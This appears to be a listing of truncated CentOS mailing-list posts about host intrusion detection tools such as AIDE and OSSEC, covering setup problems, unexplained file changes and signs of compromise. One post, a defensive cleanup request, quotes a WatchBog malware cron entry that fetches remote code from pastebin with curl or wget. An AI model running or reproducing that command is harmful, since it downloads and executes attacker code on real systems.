similar to: AIDE or OSSEC on CentOS 5.4 x86_64?

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

I have a client project to implement PCI/DSS compliance. The PCI/DSS auditor has stipulated that the web server, application middleware (tomcat), the db server have to be on different systems. In addition the auditor has also stipulated that there be a NTP server, a "patch" server, The Host OS on all of the above nodes will be CentOS 6.2. Below is a list of things that would be

Hi. On one of my servers aide just reported inode changes to a large bunch of files in a variety of directories, e.g. /usr/bin, /usr/sbin etc. This machine sits behind a couple of firewalls and it would be hard to get to. The day before I updated "clam*" and updated the aide database right after that: -rw------- 1 root root 7407412 Sep 26 10:58 aide.db.gz The problem was that the

I've checked my system by aide and i've received information: changed: /bin changed: /bin/tar changed: /bin/mv changed: /bin/cp changed: /bin/ls changed: /bin/vi i don't remember that I changed those commands, what does it mean? Somebody broken in? or those commands are changed normally? -- This message has been scanned for viruses and dangerous content by MailScanner, and is

Having problems with Tripwire on C6, I installed AIDE from the base repository. x86_64 0.14-3.el6_2.2 base 123 k typing: aide result: "Couldn't open file /var/lib/aide/aide.db.gz for reading" (directory is empty and aide.db.gz does not exist.) typing: aide -i (for initialise the Aide database) result: "AIDE, version 0.14 ### AIDE database at

Hi. I have an interesting use case. OSSEC is security tool based on server-client architecture. Server generates keys for agents, and every agent has different key. Now I want to distribute these keys via puppet. I''ve come accross hiera and installed it, and it works superbly, but how to store per-node key in hiera? This is my idea: hiera,yaml: --- :hierarchy: -

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

Hello All, My username is MikeThompson The link to configure Aide at the bottom of this page: https://wiki.centos.org/HowTos/OS_Protection Is dead, and says its dead, however, the old link to http://www.bofh-hunter.com/2008/04/10/centos-5-and-aide/ now redirects to a malicious website. One of my less than savvy users got his windows machine infected there last night. I'm wondering if it

I'm trying out aide since tripwire doesn't seem to be in the 5. releases anymore. I do not have Selinux on the server (no at installation), and I just yum installed the aide rpms, so I should have the latest. When I run my aide --init, I get all of these lines for all the files: lgetfilecon_raw failed for /usr/share/X11/app-defaults/XLogo:No data available I then copy the

In short, the reason considering (and still only considering) turning it off is to make tripwire usable again (security vs. performance, I guess). Is it possible to completely turn it off system-wide? Any additional steps needed on the existing system (that already have half of the binaries prelinked)? What order of performance degradation to expect? If it is minor, nobody is going to cry

Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based

One of my servers has recently started giving an error every time I run "aide --check". I ran it manually twice today with the same results. The second time, I added the -V flag, but that didn't give me anything useful. The system is currently running CentOS 5.3. Nothing on the system has changed recently (that I am aware of). The Aide database hasn't been updated in a few

Hi, does anyone know if aide should have access to this socket? SELinux is preventing /usr/sbin/aide from write access on the sock_file /var/run/winbindd/pipe. Thanks Patrick (on CentOS6 if that matters)

I upgraded my box from 5.3 to 5.4. When running "aide --update", I'm getting this warning message on /var/log/messages "aide: Libgcrypt warning: missing initialization - please fix the application" Below is the aide version installed: aide -v Aide 0.13.1 Compiled with the following options: WITH_MMAP WITH_POSIX_ACL WITH_SELINUX WITH_XATTR WITH_LSTAT64 WITH_READDIR64

My daily AIDE report suggests Grub''s stage2 file has changed. Could I trouble you for your opinion about how concerned I should be and what to do if your concern is moderate or higher? File: /boot/grub/stage2 MD5 : Mlkt9ZVo59SSjvodt+956Q== , yIQIMP6TUHG5BegtoOk0ug== SHA1 : ZxehaXSXcnH/WlcInHpFnyT1vcg= , dReBGlO3DIAB+mjsxUWioB8NlbE=

Sending my son back to college with a dual-boot laptop with Win 7 and CentOS 5.5. He uses Win7 to manage his iPod and SW that sometimes issued by a professor for a specific course...otherwise he uses CentOS for everything else. That setup worked well last year, except for printing. He has a low-end Cannon printer that is not supported in the Linux realm. Most of his coursework was uploaded to

I have recently received an e-mail message regarding the above wiki page. I reproduce it, below, less the header. As I was the last to edit that page, I am mentioned in the details at its foot and that is from where the message author's error originates -- as I'm not the original creator of the page. The broken link is to a section of the blog of Jim "Evolution" Perrin. Are you